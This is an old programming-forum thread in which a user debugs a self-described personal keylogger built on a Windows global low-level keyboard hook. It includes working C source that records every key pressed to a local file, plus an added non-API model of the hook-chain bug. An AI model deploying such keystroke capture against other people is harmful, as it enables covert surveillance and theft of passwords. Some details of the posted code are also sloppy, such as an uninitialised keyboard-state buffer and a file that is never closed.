Thread: SetWindowsHookEx and WM_KEYBOARD_LL

  1. #1

    SetWindowsHookEx and WM_KEYBOARD_LL

    As I delve into the depths that are Windows hooks and .dll injections, I've run into a problem. I'm trying to practice with hooks by coding a simple keylogger (for my own use, don't worry) and for some reason, it's not working.

    I'm calling SetWindowsHookEx(WH_KEYBOARD_LL... I started using WM_KEYBOARD, but it stopped working when I was showing it off to a mate of mine for some reason. Either way, after I changed to KEYBOARD_LL, it didn't work either, so I googled and googled and came up with (it actually said so in the Remarks section of the MSDN documentation) that the program that calls SetWindowsHookEx needs to have a message loop.

    So I googled again and found a perfect example which was doing the same as what I was doing, but in that piece of code, he simply calls GetMessage as follows:

    If I do this, all keyboard input gets flat out hooked and no key messages actually arrive at their destination. However, oddly enough, everything I type gets processed by my callback function and written to the file.

    Question is: What is it I'm doing wrong? Why does it work for the guy who posted his source code, but eats all the keys in mine?

    Here's the source code for the function in the .dll and the main source code (yes, I know, I don't need a DLL for this, but I already made one when I found out). Is there something wrong in the callback function?

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #define DLL_NAME "C:\\programming\\c\\windowshook.dll"
    int main(void)
    {
         HANDLE hDll = LoadLibrary(DLL_NAME);
         LPVOID procAddress = GetProcAddress(hDll, "HookProc");
         HHOOK wHook;
         printf("\n** Address of HookProc: 0x%08x\n"
                "** Press enter to set hook ..\n", (unsigned int)procAddress);
         wHook = SetWindowsHookEx(WH_KEYBOARD_LL, procAddress, hDll, 0);
         if(wHook == NULL)
         {
                  printf("-- Hook could not be set: %d\n", (unsigned int)GetLastError());
                  return -1;
         }
         printf("++ Hook set. Press enter to unhook ..\n");
         /* Message loop required by the low-level hook */
         while(GetMessage(0,0, 0,0))
         {
         }
         printf("++ Unhooking successful.\n");
         return 0;
    }

    __declspec (dllexport) LRESULT CALLBACK HookProc (int nCode, WPARAM wParam, LPARAM lParam)
    {
         if(nCode < 0) { return CallNextHookEx(0, nCode, wParam, lParam); }
         if(nCode == HC_ACTION)
         {
              if(wParam == WM_KEYDOWN)
              {
                   KBDLLHOOKSTRUCT *kbdHookStruct = (KBDLLHOOKSTRUCT*)lParam;
                   FILE *out = fopen("C:\\programming\\C\\loel.txt", "a+");
                   char kbdState[256];
                   int theChar;
                   ToAsciiEx(kbdHookStruct->vkCode, kbdHookStruct->scanCode, kbdState, (WORD*)&theChar, 0, GetKeyboardLayout(0));
                   fputc(theChar, out);
                   /* Nonzero return: the key is not passed on (see the EDIT below) */
                   return 1;
              }
         }
         return CallNextHookEx(0, nCode, wParam, lParam);
    }

    EDIT: Aw mah gawd.. Sorry about that. JUST after I posted the post, I figured out that return 1 after processing the message could mean that I wouldn't send the message on. And so it was. Instead of return 1, return the return value from CallNextHookEx like at the bottom of the code.
    Sorry again - I've been around with this for hours to no avail and decided to eventually post.
    Last edited by IceDane; 02-28-2008 at 10:07 AM.
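
The return-value behaviour described in the EDIT, as an added example that is not part of the original post: a portable C model of a hook chain that compares the posted callback with the corrected one. It makes no Windows API calls and records no key data; `call_next`, `deliver`, `observed_count` and the two hook names are hypothetical stand-ins, and the constants only mirror the Win32 values.

```c
#include <stddef.h>

/* Portable model of a hook chain. Nothing here calls the Windows API. */
#define HC_ACTION  0
#define WM_KEYDOWN 0x0100
#define WM_KEYUP   0x0101

typedef long (*hook_fn)(int code, unsigned msg, size_t next);

static hook_fn chain[4];   /* installed hooks, most recent first */
static size_t  chain_len;
static int     observed;   /* key-down events a hook looked at */

/* Stand-in for CallNextHookEx: run the next hook, or return 0 at the end. */
static long call_next(int code, unsigned msg, size_t next) {
    return next < chain_len ? chain[next](code, msg, next + 1) : 0;
}

/* As posted: returning 1 after handling WM_KEYDOWN swallows the key. */
long hook_as_posted(int code, unsigned msg, size_t next) {
    if (code < 0) return call_next(code, msg, next);
    if (code == HC_ACTION && msg == WM_KEYDOWN) { observed++; return 1; }
    return call_next(code, msg, next);
}

/* As corrected in the EDIT: observe, then always hand the event on. */
long hook_fixed(int code, unsigned msg, size_t next) {
    if (code == HC_ACTION && msg == WM_KEYDOWN) observed++;
    return call_next(code, msg, next);
}

/* Dispatch n key-down/key-up pairs through one hook and return how many
   events reach the target. A nonzero chain result drops the event. */
int deliver(hook_fn hook, int n) {
    int delivered = 0;
    chain[0] = hook; chain_len = 1; observed = 0;
    for (int i = 0; i < n; i++) {
        if (call_next(HC_ACTION, WM_KEYDOWN, 0) == 0) delivered++;
        if (call_next(HC_ACTION, WM_KEYUP, 0) == 0) delivered++;
    }
    return delivered;
}

int observed_count(void) { return observed; }

int main(void) {
    return (deliver(hook_as_posted, 3) == 3 && deliver(hook_fixed, 3) == 6) ? 0 : 1;
}
```

With the posted callback only the key-up events arrive, which matches the symptom of input being eaten while the callback still sees every key press.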
